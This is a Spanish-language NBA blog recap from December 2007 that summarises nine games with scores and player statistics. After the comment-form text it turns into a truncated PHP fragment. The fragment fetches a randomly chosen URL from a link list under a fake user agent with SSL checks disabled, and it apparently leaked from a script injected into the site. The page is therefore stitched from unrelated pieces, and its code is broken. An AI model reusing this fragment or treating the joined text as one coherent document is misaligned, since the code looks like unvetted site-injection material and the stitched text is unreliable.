La crónica (22/12/07)

23 de December de 2007 por txusma

Después de perdernos un día de NBA volvemos a publicar nuestra crónica diaria. De nuevo un gran día para los aficionados a la mejor liga de baloncesto del mundo, con partidos y actuaciones individuales interesantísimas: 2 encuentros ganados en el último segundo con sendas canastas ganadoras de Dwyane Wade y Andre Iguodala; primer gran partido del chino Yi Jianli que esta vez no se tuvo que repartir minutos con Villanueva; victoria de New Jersey ante los Warriors con actuación estelar del segundo Big Three de la liga; victoria de los Suns ante Toronto con actuación estelar de Barbosa. Los detalles, en la crónica:

 

 

Wizards 85 – Pacers 93

Hay ocasiones en que los equipos con muchas bajas se mentalizan para jugar más en equipo y dar el 150%, pudiendo poner en problemas a cualquier rival. Ayer, unos Wizards sin Arenas, Butler y Daniels mantuvieron un pulso con Indiana que no se resolvió hasta el último cuarto y gracias a una buena actuación de Danny Granger. NO fue un buen partido y tan solo el mismo Granger y Jermaine O’Neal por parte de Indiana y Antwan Jamison y Roger Mason por parte de Washignton cuajaron buenas actuaciones. Esta victoria supone la cuarta en cinco partidos para los Pacers.

Warriors 95 – New Jersey 100

Por fin el Big Three de los Nets actuócomo tal y fue piedra angular para ganar un complicado partido a los Warriors. Richard Jefferson acabó con 31 puntos, Jason Kidd consiguió su triple doble número 94 y Vince Carter anotó 23 puntos, incluyendo un triple a falta de 23 segundos que acabó de finiquitar el partido. Además recibieron la ayuda en el juego interior de Josh Boone que se fue a los 19 puntos y 13 rebotes. Enfrente, unos Warriors que no jugaron un gran partido y que no estuvieron nada inspirados en el tiro. Stephen Jackson con 21 puntos y Monta Ellis con 19 fueron sus jugadores más destacados.

Jazz 102 – Heat 104

Partido resuelto por una canasta postrera de Wade que sirve para romper la mala racha de los Heat que venian de perder 4 de sus últimos 5 partidos. Shaq recibió más balones al poste bajo y el equipo lo notó llevando la delantera la gran mayoria del partido, el Perro Grande acabo con 17 pts y 10 rebotes pero eliminado por faltas, y junto a Wade con 20 tantos y los suplentes Barron y Cook (mortal de necesidad su triple a 28 segundos del final) fueron los artífices de la victoria. Por los Jazz los mejores Deron Williams con 22 pts y 7 asistencias, Kirilenko con 21 pts y 7 rebotes, y el reserva CJ Miles responsable de la remontada en el último cuarto con 20 pts, 11 de ellos en el ultimo período. En el lado negativo un desconocido Boozer con 10 pts 10 rebotes pero con una serie lamentable de 4 de 16 en tiros de campo.

Wolves 76 – Hornets 110

El cansacio, unido a la ya de por si poca calidad de la plantilla de Minnesotta provocó que ayer los aficionados que se acercaron al New Orleans Arena se encontraran con un partido sin ninguna historia desde el primer momento y finiquitado por un inconmesurable Paul con 19 pts y 15 asistencias, bien secundado por David West con 22 pts y 7 rebotes. Stojakovic volvió tras su enésima lesión y anotó 11 pts. En unos anodinos Wolves exhaustos por la remontada en la noche anterior frente a Pacers, tan solo destacó Gomes con 20 pts y 9 rebotes mientras que McCants y Jaric no jugaron por gripe.

76ers 99 -Grizzlies 97

Un tremendo último cuarto de Iguodala (17 puntos) con buzzer-beater incluido dio la victoria a Philadelphia sobre unos Memphis que han perdido 9 de sus últimos 11 partidos. A pesar de la buena defensa de Mike Miller, Iguodala conectó un tiro de 6 metros que devolvió a los Grizzlies la moneda que le hicieron pagar hace unos dias a San Antonio. Pau Gasol jugó su mejor partido de la temporada con 31 puntos, 13 rebotes, 4 asistencias y una energía que no se le recordaba en lo que llevamos de temporada. A su lado Mike Miller y Rudy Gay fueron sus perfectos escuderos con 19 puntos cada uno. Por los Sixers el mejor Andre Miller con 29 puntos. Iguodala acabó con 23 puntos, pero con 9 de 21 tiros de campos anotados. Dalembert con 14 fue el máximo reboteador del partido.

Rockets 116 – Bulls 98

Los Chicago Bulls siguen poniendo a prueba la fe de sus aficionados y a éstos la crisis les empieza a rondar. Aunque siguen apareciendo en la mayoría de apuestas como equipo de playoffs, va siendo hora de cambiar la dinámica y convertirse en un equipo ganador. Ayer se encontraron con un T-Mac que volvía a jugar después del descanso obligado contra Denver y éste acabó con 20 puntos y 8 asistencias. Muchas de estas asistencias tuvieron su destino en jugadores colocados tras la linea de 3 puntos, como Luther Head, que acabó con 13 puntos y 3 triples o Shanne Battier, 14 puntos y 4 triples. Yao Ming jugó sólo 27 minutos debido a una pequeña lesión que le mantuvo sentado durante el tercer cuarto pero contribuyó a la victoria con 18 puntos y 8 puntos. Scola también realizó un gran partido con 14 puntos y 11 rebotes. Por parte de los Bulls Deng y Hinrich fueron los más destacados con 21 y 22 puntos, respectivamente, mientras que Ben Wallace acabó con 0 puntos y 5 rebotes en 27 minutos de juego.

Clippers 90 – Spurs 99

Cuarta derrota consecutiva para unos lastrados Clippers (anoche tampoco jugó Maggette), en los que el rookie Thornton con 25 pts, 6 rebotes y el omnipresente Kaman con 20 pts 10 rebotes y 6 tapones se tuvieron que multiplicar para plantar cara a los Campeones, apoyados por Cuttino con 17 pts. Los Clippers lucharon hasta la extenuación llegándose a poner a 6 pts a 1:40 del final, pero Duncan con una jugada de 3 ptos y 2 tiros libres acabó finiquitando el partido. Por los texanos, Duncan va afinando la forma con 34 pts y 18 rebotes, y Parker volvió tras su lesión con 18 pts. En el negativo Ginobili abandonó el partido en el primer cuarto por una lesión en su dedo y no volvió a jugar.

Bobcats 99 – Bucks 103

Partido marcado por la fatiga de los chicos de Bobcats que por problemas en los enlaces llegaron a la ciudad cervecera solamente 1 hora antes del partido. De hecho el resultado es bastante engañoso maquillado por dos triples postreros de Wallace y Dudley. Por los Bobcats cumplió el quinteto en bloque destacando sobre los demas J.Richardson con 30 pts; el banquillo es inexistente por las lesiones para toda la temporada de May y de Okafor y por el último traspaso de Herrman y de Brezec, lesionándose además McInnis en el tercer cuarto.Por los Bucks, partidazo de Yi Jianlian con 29 pts y 10 rebotes con porcentajes escandalosos, 14 de 17 en tiros de campo, muy bien secundado por Redd con 27 pts (pero malos porcentajes) y Maurice Williams con 22 pts y 9 asistencias.

Raptors 103 – Suns 122

A pesar del megapartido de Chris Bosh con 42 pts y 13 rebotes, los Suns rompieron el partido en el tercer cuarto con un parcial de 37-22, yéndose a los 20 pts de diferencia y desbordando a unos Raptors que hacian aguas por todas partes. Tan solo Calderón y Bargnani apoyaron ligeramente a su jugador franquicia con 15 y 13 pts respectivamente. Por Phoenix Barbosa aprovechó la ausencia de Bell y se fue a los 31 pts y 7 de 10 en triples, junto con Hill (25 pts) y Amare con 28 pts y 11 rebotes, fue el más destacado de su equipo.

Y para finalizar las mejores jugadas del día. No os perdáis las canastas ganadoras de Wade e Iguodala:

 

 

 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>